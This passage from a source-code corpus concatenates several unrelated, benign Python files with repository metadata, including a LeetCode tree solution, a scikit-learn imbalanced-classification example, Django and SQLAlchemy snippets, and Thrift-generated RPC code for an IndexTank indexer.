                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Criado em')),
                ('updated_at', models.DateTimeField(auto_now=True, verbose_name='Atualizado em')),
                ('uuid', models.UUIDField(default=uuid.uuid4, editable=False, unique=True, verbose_name='UUID')),
                ('name', models.CharField(max_length=255, verbose_name='nome')),
            ],
            options={
                'verbose_name': 'Especialidade',
                'verbose_name_plural': 'Especialidades',
            },
        ),
    ]
| [
"gabrielloliveira097@gmail.com"
] | gabrielloliveira097@gmail.com |
a13a4d56104bd687f7c9c1b4efa6c7b4fb4ee4e4 | 2020c9c6958d9cc338b72f62e24d9ad30c1a8cad | /python/0101.symmetric-tree/symmetric-tree.py | 8cf51e4680551dbd6d293ddb24a39ee7fa4c43f7 | [] | no_license | ysmintor/leetcode | b2d87db932b77e72504ffa07d7bf1b0d8c09b661 | 434889037fe3e405a8cbc71cd822eb1bda9aa606 | refs/heads/master | 2020-05-30T21:03:03.886279 | 2019-10-31T08:46:23 | 2019-10-31T09:02:24 | 189,963,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 534 | py | class Solution:
"""
recursive solution
"""
def isSymmetric(self, root: TreeNode) -> bool:
if root == None:
return True
return self.isMirror(root.left, root.right)
def isMirror(self, t1: TreeNode, t2:TreeNode ) -> bool:
if t1 == None and t2 == None:
return True
if t1 == None or t2 == None:
return False
return (t1.val == t2.val) \
and self.isMirror(t1.right, t2.left) \
and self.isMirror(t1.left, t2.right)
| [
"ysmintor@gmail.com"
] | ysmintor@gmail.com |
f86011e920527fade4c0b894ea3f406f6ca86766 | 9b20743ec6cd28d749a4323dcbadb1a0cffb281b | /10_Imbalanced_Classification_with_Python/13/03_balanced_decision_tree.py | 723ce924b4ed4330ac7a194e25defea465a60bfa | [] | no_license | jggrimesdc-zz/MachineLearningExercises | 6e1c7e1f95399e69bba95cdfe17c4f8d8c90d178 | ee265f1c6029c91daff172b3e7c1a96177646bc5 | refs/heads/master | 2023-03-07T19:30:26.691659 | 2021-02-19T08:00:49 | 2021-02-19T08:00:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 823 | py | # decision tree with class weight on an imbalanced classification dataset
from numpy import mean
from sklearn.datasets import make_classification
from sklearn.model_selection import RepeatedStratifiedKFold
from sklearn.model_selection import cross_val_score
from sklearn.tree import DecisionTreeClassifier
# generate dataset: 10,000 samples, 2 informative features, ~1% minority
# class (weights=[0.99] is the majority share; flip_y=0 means no label noise)
X, y = make_classification(n_samples=10000, n_features=2, n_redundant=0, n_clusters_per_class=1, weights=[0.99],
                           flip_y=0, random_state=3)
# define model: 'balanced' weights each class inversely proportional to its
# frequency, counteracting the 99:1 class imbalance during tree induction
model = DecisionTreeClassifier(class_weight='balanced')
# define evaluation procedure: stratified 10-fold CV repeated 3 times keeps
# the minority-class ratio stable in every fold
cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=3, random_state=1)
# evaluate model on ROC AUC (threshold-independent, imbalance-appropriate)
scores = cross_val_score(model, X, y, scoring='roc_auc', cv=cv, n_jobs=-1)
# summarize performance across the 30 folds
print('Mean ROC AUC: %.3f' % mean(scores))
| [
"jgrimes@jgrimes.tech"
] | jgrimes@jgrimes.tech |
7c847d5608c0383cb74ad877bd64cbdd8ac68671 | 5b8893290c0688d9db512865f2b124355eccc06e | /news_recommendation_service/click_log_processor_test.py | 9b5e5f205d2d69549274ea03c38ca3db2ee10cce | [] | no_license | aaronmarveller/News-Secretary- | 52dddeb729ddff91b4f4f79741f3412c2ab96ae8 | 5ab079976a5545bc1a965bb81d195ac6dfb7e0b2 | refs/heads/master | 2022-12-14T22:24:15.119183 | 2019-12-02T19:05:55 | 2019-12-02T19:05:55 | 211,028,401 | 0 | 0 | null | 2022-11-21T21:39:06 | 2019-09-26T07:33:32 | Jupyter Notebook | UTF-8 | Python | false | false | 911 | py | import click_log_processor
import os
import sys
from datetime import datetime
# import common package in parent directory
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
import mongodb_client
# Mongo collection holding each user's learned topic-preference vector.
PREFERENCE_MODEL_TABLE_NAME = "user_preference_model"
# Mongo collection holding news documents.
NEWS_TABLE_NAME = "news"
# Number of news topic classes in the preference vector.
NUM_OF_CLASSES = 8
def test_basic():
db = mongodb_client.get_db()
db[PREFERENCE_MODEL_TABLE_NAME].delete_many({"userId": "test_user"})
msg = {"userId": "test_user",
"newsId": "n0GWi/32LzHUyxG8IRggWg==\n",
"timestamp": str(datetime.utcnow())}
click_log_processor.handle_message(msg)
model = db[PREFERENCE_MODEL_TABLE_NAME].find_one({'userId':'test_user'})
assert model is not None
assert len(model['preference']) == NUM_OF_CLASSES
print('test_basic passed!')
if __name__ == "__main__":
test_basic() | [
"peiyuanl@usc.edu"
] | peiyuanl@usc.edu |
68bfd4e76590f1df88be225c2f0c12f57e6d3a86 | 6b42fdcd2f61eaee2d80cd1372233b5cc5c66f0c | /Caption's_shield(turtle).py | ff92820f0defb182ae5be3f345e2c210df8e056b | [] | no_license | Anaa29/Python-codes | 984ba797c0f308d57d4a2fd40c08db1d402d55e8 | af7e7af85f59e7a527892039def395c1b9cce7ec | refs/heads/main | 2023-08-06T06:07:17.586635 | 2021-10-11T14:05:44 | 2021-10-11T14:05:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | from turtle import *
# Draw a shield: four concentric red rings plus a blue spiral star in the
# middle (repo name suggests a Captain America style shield).
bgcolor("white")
pencolor("red")
hideturtle()
speed(0)  # fastest drawing speed
penup()
goto(0,-200)
pendown()
pensize(5)
# turtle.circle() starts drawing from the turtle's current position, so each
# ring is re-anchored below the centre before being drawn.
circle(240)  # outermost ring
penup()
goto(0,-160)
pendown()
circle(200)
penup()
goto(0,-120)
pendown()
circle(160)
penup()
goto(0,-80)
pendown()
circle(120)
penup()
goto(0,40)
pendown()
pencolor("blue")
for i in range(220):  # star: 144-degree turns with a growing stroke length
    forward(i)
    right(144)
| [
"noreply@github.com"
] | noreply@github.com |
6aec32137b0b9097f9eb10fc15dc24b304330007 | 8b0c8d30fb6182b564f516127ebd4bccd7b4e97d | /flasky/models/hold.py | d2e5ea7cbc3e9cbae9beebea0d61a1953c941cde | [] | no_license | rthoward/flasky | fbac5d5f68580135aa0893514a6ee48ad0a49e63 | 20a61df2f4f9ecbfea5988e8984a08bdb1e37742 | refs/heads/master | 2020-05-26T17:53:27.657831 | 2019-06-02T02:53:39 | 2019-06-02T02:53:39 | 188,326,987 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,008 | py | import typing
from sqlalchemy import String, Column, Integer, ForeignKey, UniqueConstraint, TIMESTAMP
from sqlalchemy.orm import relationship
from . import Base
from .mixins import TimestampsMixin
if typing.TYPE_CHECKING:
from .event import Event
from .user import User
class Hold(Base, TimestampsMixin):  # type: ignore
    """A user's reservation of some quantity against an event.

    A database-level unique constraint allows at most one hold per
    (user, event) pair.
    """
    __tablename__ = "holds"

    id = Column(Integer, primary_key=True)
    # How many units this hold reserves.
    quantity = Column(Integer, nullable=False)
    # Optional expiry time; indexed so expired holds can be swept efficiently.
    # NOTE(review): stored as a naive timestamp (timezone=False) -- confirm
    # that all writers use a single, consistent timezone.
    ends_at = Column(TIMESTAMP(timezone=False), nullable=True, index=True)

    user_id = Column(Integer, ForeignKey("users.id"), nullable=False)
    user = relationship("User", back_populates="holds")

    event_id = Column(Integer, ForeignKey("events.id"), nullable=False, index=True)
    event = relationship("Event", back_populates="holds")

    # Enforce one hold per user per event.
    __table_args__ = (UniqueConstraint("user_id", "event_id"),)

    def __repr__(self):
        return "<Hold id={} event_name={} qty={}>".format(
            self.id, self.event.name, self.quantity
        )
| [
"richard@howard.io"
] | richard@howard.io |
30dea1db000cc40ea6b735e332cf15c6d2f4bace | 6413fe58b04ac2a7efe1e56050ad42d0e688adc6 | /tempenv/lib/python3.7/site-packages/plotly/graph_objs/layout/ternary/aaxis/__init__.py | 797a36fb417fb76496384beb1c5bdf6c09acee6b | [
"MIT"
] | permissive | tytechortz/Denver_temperature | 7f91e0ac649f9584147d59193568f6ec7efe3a77 | 9d9ea31cd7ec003e8431dcbb10a3320be272996d | refs/heads/master | 2022-12-09T06:22:14.963463 | 2019-10-09T16:30:52 | 2019-10-09T16:30:52 | 170,581,559 | 1 | 0 | MIT | 2022-06-21T23:04:21 | 2019-02-13T21:22:53 | Python | UTF-8 | Python | false | false | 159 | py | from ._title import Title
from plotly.graph_objs.layout.ternary.aaxis import title
from ._tickformatstop import Tickformatstop
from ._tickfont import Tickfont
| [
"jmswank7@gmail.com"
] | jmswank7@gmail.com |
11b41900468b82ef7940e02e889324872ea46a3f | f44a1cbb48952ce466310859234f73cb2769ef2c | /backend/mobile_5_oct_1723/wsgi.py | b09e1b28f4e63a9fbc6f3a96c61672bb2582051a | [] | no_license | crowdbotics-apps/mobile-5-oct-1723 | ea496e71e634a67dccfb39019dd50d9351247943 | 94ddd875afaa86d5810d24644a35e23db6b231d1 | refs/heads/master | 2022-12-25T10:00:21.575101 | 2020-10-05T05:14:39 | 2020-10-05T05:14:39 | 301,300,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | """
WSGI config for mobile_5_oct_1723 project.

It exposes the WSGI callable as a module-level variable named ``application``.

For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""

import os

from django.core.wsgi import get_wsgi_application

# Point Django at the project's settings module unless the environment
# already specifies one.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mobile_5_oct_1723.settings')

application = get_wsgi_application()
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
d459bddbd0f3aa4b8e20ce26a6a7fd7c6bba651b | f393e818e1e7043fe6612717355e3d4aa60e4b20 | /3.3.py | 2b6f9fe07943843e09ff55d78daa445e57d51dfb | [] | no_license | janejh/PY4E | f76ea87eb87f31c1b9fb3d302ceae57785c7d702 | 7cf9d3e42e7579777a9f031d00486ae47e215234 | refs/heads/master | 2020-04-04T23:17:22.477365 | 2018-11-26T04:51:19 | 2018-11-26T04:51:19 | 156,353,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | #3.3 Write a program to prompt for a score between 0.0 and 1.0. If the score is out of range, print an error. If the score is between 0.0 and 1.0, print a grade using the following table:
# Score   Grade
# >= 0.9  A
# >= 0.8  B
# >= 0.7  C
# >= 0.6  D
# <  0.6  F
# If the user enters a value out of range, print a suitable error message
# and exit. For the test, enter a score of 0.85.


def grade(score):
    """Return the letter grade for ``score``.

    Args:
        score: a float; valid scores lie in [0.0, 1.0].

    Returns:
        'A'..'F' for an in-range score, or 'error' when the score is
        outside [0.0, 1.0].
    """
    # Range check first so an out-of-range score never falls through to
    # the grading chain (the original printed both "error" AND a grade).
    if score < 0.0 or score > 1.0:
        return "error"
    if score >= 0.9:
        return "A"
    if score >= 0.8:
        return "B"
    if score >= 0.7:
        return "C"
    if score >= 0.6:
        return "D"
    return "F"


if __name__ == "__main__":
    try:
        s = float(input("Enter Score: "))
    except ValueError:
        # The original continued after a failed parse and crashed with a
        # NameError on the undefined ``s``; exit after reporting instead.
        raise SystemExit("Error, please enter a valid score.")
    print(grade(s))
| [
"noreply@github.com"
] | noreply@github.com |
03094c11f0802ec69b127a4e182849ed912ba923 | 8284ad49884e5f47ecb3f673846d616997adec61 | /gen-py/flaptor/indextank/rpc/Indexer.py | a3eda578cf644eb152204f88775f3a4e3af5d8e2 | [
"Apache-2.0"
] | permissive | kemitche/indextank-service | aa0a5f556ed3a2ac248bbb85182893354143d919 | 80c47e52520ad0c8c988c35e23ce62696e327266 | refs/heads/master | 2021-01-15T21:02:35.420570 | 2012-01-03T13:27:03 | 2012-01-03T13:27:03 | 3,103,835 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 83,755 | py | #
# Autogenerated by Thrift
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
from thrift.Thrift import *
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
  """Thrift-generated service interface for the IndexTank Indexer.

  Servers implement these methods; the generated Client class provides the
  matching RPC stubs. Every method body here is intentionally a stub.
  """
  def addDoc(self, docid, doc, timestamp_boost, boosts):
    """
    Parameters:
     - docid
     - doc
     - timestamp_boost
     - boosts
    """
    pass

  def updateTimestampBoost(self, docid, timestamp_boost):
    """
    Parameters:
     - docid
     - timestamp_boost
    """
    pass

  def updateBoost(self, docid, boosts):
    """
    Parameters:
     - docid
     - boosts
    """
    pass

  def updateCategories(self, docid, categories):
    """
    Parameters:
     - docid
     - categories
    """
    pass

  def delDoc(self, docid):
    """
    Parameters:
     - docid
    """
    pass

  def promoteResult(self, docid, query):
    """
    Parameters:
     - docid
     - query
    """
    pass

  def dump(self, ):
    pass

  def addScoreFunction(self, functionIndex, definition):
    """
    Parameters:
     - functionIndex
     - definition
    """
    pass

  def removeScoreFunction(self, functionIndex):
    """
    Parameters:
     - functionIndex
    """
    pass

  def listScoreFunctions(self, ):
    pass

  def stats(self, ):
    pass

  def get_stats(self, ):
    pass

  def force_gc(self, ):
    pass

  def getStatus(self, ):
    pass

  def ping(self, ):
    pass

  def startFullRecovery(self, ):
    pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot != None:
self._oprot = oprot
self._seqid = 0
def addDoc(self, docid, doc, timestamp_boost, boosts):
"""
Parameters:
- docid
- doc
- timestamp_boost
- boosts
"""
self.send_addDoc(docid, doc, timestamp_boost, boosts)
self.recv_addDoc()
def send_addDoc(self, docid, doc, timestamp_boost, boosts):
self._oprot.writeMessageBegin('addDoc', TMessageType.CALL, self._seqid)
args = addDoc_args()
args.docid = docid
args.doc = doc
args.timestamp_boost = timestamp_boost
args.boosts = boosts
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_addDoc(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = addDoc_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def updateTimestampBoost(self, docid, timestamp_boost):
"""
Parameters:
- docid
- timestamp_boost
"""
self.send_updateTimestampBoost(docid, timestamp_boost)
self.recv_updateTimestampBoost()
def send_updateTimestampBoost(self, docid, timestamp_boost):
self._oprot.writeMessageBegin('updateTimestampBoost', TMessageType.CALL, self._seqid)
args = updateTimestampBoost_args()
args.docid = docid
args.timestamp_boost = timestamp_boost
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_updateTimestampBoost(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = updateTimestampBoost_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def updateBoost(self, docid, boosts):
"""
Parameters:
- docid
- boosts
"""
self.send_updateBoost(docid, boosts)
self.recv_updateBoost()
def send_updateBoost(self, docid, boosts):
self._oprot.writeMessageBegin('updateBoost', TMessageType.CALL, self._seqid)
args = updateBoost_args()
args.docid = docid
args.boosts = boosts
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_updateBoost(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = updateBoost_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def updateCategories(self, docid, categories):
"""
Parameters:
- docid
- categories
"""
self.send_updateCategories(docid, categories)
self.recv_updateCategories()
def send_updateCategories(self, docid, categories):
self._oprot.writeMessageBegin('updateCategories', TMessageType.CALL, self._seqid)
args = updateCategories_args()
args.docid = docid
args.categories = categories
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_updateCategories(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = updateCategories_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def delDoc(self, docid):
"""
Parameters:
- docid
"""
self.send_delDoc(docid)
self.recv_delDoc()
def send_delDoc(self, docid):
self._oprot.writeMessageBegin('delDoc', TMessageType.CALL, self._seqid)
args = delDoc_args()
args.docid = docid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_delDoc(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = delDoc_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def promoteResult(self, docid, query):
"""
Parameters:
- docid
- query
"""
self.send_promoteResult(docid, query)
self.recv_promoteResult()
def send_promoteResult(self, docid, query):
self._oprot.writeMessageBegin('promoteResult', TMessageType.CALL, self._seqid)
args = promoteResult_args()
args.docid = docid
args.query = query
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_promoteResult(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = promoteResult_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def dump(self, ):
self.send_dump()
self.recv_dump()
def send_dump(self, ):
self._oprot.writeMessageBegin('dump', TMessageType.CALL, self._seqid)
args = dump_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_dump(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = dump_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def addScoreFunction(self, functionIndex, definition):
"""
Parameters:
- functionIndex
- definition
"""
self.send_addScoreFunction(functionIndex, definition)
self.recv_addScoreFunction()
def send_addScoreFunction(self, functionIndex, definition):
self._oprot.writeMessageBegin('addScoreFunction', TMessageType.CALL, self._seqid)
args = addScoreFunction_args()
args.functionIndex = functionIndex
args.definition = definition
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_addScoreFunction(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = addScoreFunction_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def removeScoreFunction(self, functionIndex):
"""
Parameters:
- functionIndex
"""
self.send_removeScoreFunction(functionIndex)
self.recv_removeScoreFunction()
def send_removeScoreFunction(self, functionIndex):
self._oprot.writeMessageBegin('removeScoreFunction', TMessageType.CALL, self._seqid)
args = removeScoreFunction_args()
args.functionIndex = functionIndex
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_removeScoreFunction(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = removeScoreFunction_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def listScoreFunctions(self, ):
self.send_listScoreFunctions()
return self.recv_listScoreFunctions()
def send_listScoreFunctions(self, ):
self._oprot.writeMessageBegin('listScoreFunctions', TMessageType.CALL, self._seqid)
args = listScoreFunctions_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_listScoreFunctions(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = listScoreFunctions_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.ite != None:
raise result.ite
raise TApplicationException(TApplicationException.MISSING_RESULT, "listScoreFunctions failed: unknown result");
def stats(self, ):
self.send_stats()
return self.recv_stats()
def send_stats(self, ):
self._oprot.writeMessageBegin('stats', TMessageType.CALL, self._seqid)
args = stats_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_stats(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = stats_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.ite != None:
raise result.ite
raise TApplicationException(TApplicationException.MISSING_RESULT, "stats failed: unknown result");
def get_stats(self, ):
self.send_get_stats()
return self.recv_get_stats()
def send_get_stats(self, ):
self._oprot.writeMessageBegin('get_stats', TMessageType.CALL, self._seqid)
args = get_stats_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_stats(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_stats_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.ite != None:
raise result.ite
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_stats failed: unknown result");
def force_gc(self, ):
self.send_force_gc()
self.recv_force_gc()
def send_force_gc(self, ):
self._oprot.writeMessageBegin('force_gc', TMessageType.CALL, self._seqid)
args = force_gc_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_force_gc(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = force_gc_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def getStatus(self, ):
self.send_getStatus()
return self.recv_getStatus()
def send_getStatus(self, ):
self._oprot.writeMessageBegin('getStatus', TMessageType.CALL, self._seqid)
args = getStatus_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getStatus(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getStatus_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "getStatus failed: unknown result");
def ping(self, ):
self.send_ping()
self.recv_ping()
def send_ping(self, ):
self._oprot.writeMessageBegin('ping', TMessageType.CALL, self._seqid)
args = ping_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_ping(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = ping_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
return
def startFullRecovery(self, ):
self.send_startFullRecovery()
self.recv_startFullRecovery()
def send_startFullRecovery(self, ):
self._oprot.writeMessageBegin('startFullRecovery', TMessageType.CALL, self._seqid)
args = startFullRecovery_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_startFullRecovery(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = startFullRecovery_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
return
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["addDoc"] = Processor.process_addDoc
self._processMap["updateTimestampBoost"] = Processor.process_updateTimestampBoost
self._processMap["updateBoost"] = Processor.process_updateBoost
self._processMap["updateCategories"] = Processor.process_updateCategories
self._processMap["delDoc"] = Processor.process_delDoc
self._processMap["promoteResult"] = Processor.process_promoteResult
self._processMap["dump"] = Processor.process_dump
self._processMap["addScoreFunction"] = Processor.process_addScoreFunction
self._processMap["removeScoreFunction"] = Processor.process_removeScoreFunction
self._processMap["listScoreFunctions"] = Processor.process_listScoreFunctions
self._processMap["stats"] = Processor.process_stats
self._processMap["get_stats"] = Processor.process_get_stats
self._processMap["force_gc"] = Processor.process_force_gc
self._processMap["getStatus"] = Processor.process_getStatus
self._processMap["ping"] = Processor.process_ping
self._processMap["startFullRecovery"] = Processor.process_startFullRecovery
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_addDoc(self, seqid, iprot, oprot):
args = addDoc_args()
args.read(iprot)
iprot.readMessageEnd()
result = addDoc_result()
try:
self._handler.addDoc(args.docid, args.doc, args.timestamp_boost, args.boosts)
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("addDoc", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_updateTimestampBoost(self, seqid, iprot, oprot):
args = updateTimestampBoost_args()
args.read(iprot)
iprot.readMessageEnd()
result = updateTimestampBoost_result()
try:
self._handler.updateTimestampBoost(args.docid, args.timestamp_boost)
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("updateTimestampBoost", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_updateBoost(self, seqid, iprot, oprot):
args = updateBoost_args()
args.read(iprot)
iprot.readMessageEnd()
result = updateBoost_result()
try:
self._handler.updateBoost(args.docid, args.boosts)
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("updateBoost", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_updateCategories(self, seqid, iprot, oprot):
args = updateCategories_args()
args.read(iprot)
iprot.readMessageEnd()
result = updateCategories_result()
try:
self._handler.updateCategories(args.docid, args.categories)
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("updateCategories", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_delDoc(self, seqid, iprot, oprot):
args = delDoc_args()
args.read(iprot)
iprot.readMessageEnd()
result = delDoc_result()
try:
self._handler.delDoc(args.docid)
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("delDoc", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_promoteResult(self, seqid, iprot, oprot):
args = promoteResult_args()
args.read(iprot)
iprot.readMessageEnd()
result = promoteResult_result()
try:
self._handler.promoteResult(args.docid, args.query)
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("promoteResult", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_dump(self, seqid, iprot, oprot):
args = dump_args()
args.read(iprot)
iprot.readMessageEnd()
result = dump_result()
try:
self._handler.dump()
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("dump", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_addScoreFunction(self, seqid, iprot, oprot):
args = addScoreFunction_args()
args.read(iprot)
iprot.readMessageEnd()
result = addScoreFunction_result()
try:
self._handler.addScoreFunction(args.functionIndex, args.definition)
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("addScoreFunction", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_removeScoreFunction(self, seqid, iprot, oprot):
args = removeScoreFunction_args()
args.read(iprot)
iprot.readMessageEnd()
result = removeScoreFunction_result()
try:
self._handler.removeScoreFunction(args.functionIndex)
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("removeScoreFunction", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_listScoreFunctions(self, seqid, iprot, oprot):
args = listScoreFunctions_args()
args.read(iprot)
iprot.readMessageEnd()
result = listScoreFunctions_result()
try:
result.success = self._handler.listScoreFunctions()
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("listScoreFunctions", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_stats(self, seqid, iprot, oprot):
args = stats_args()
args.read(iprot)
iprot.readMessageEnd()
result = stats_result()
try:
result.success = self._handler.stats()
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("stats", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_stats(self, seqid, iprot, oprot):
args = get_stats_args()
args.read(iprot)
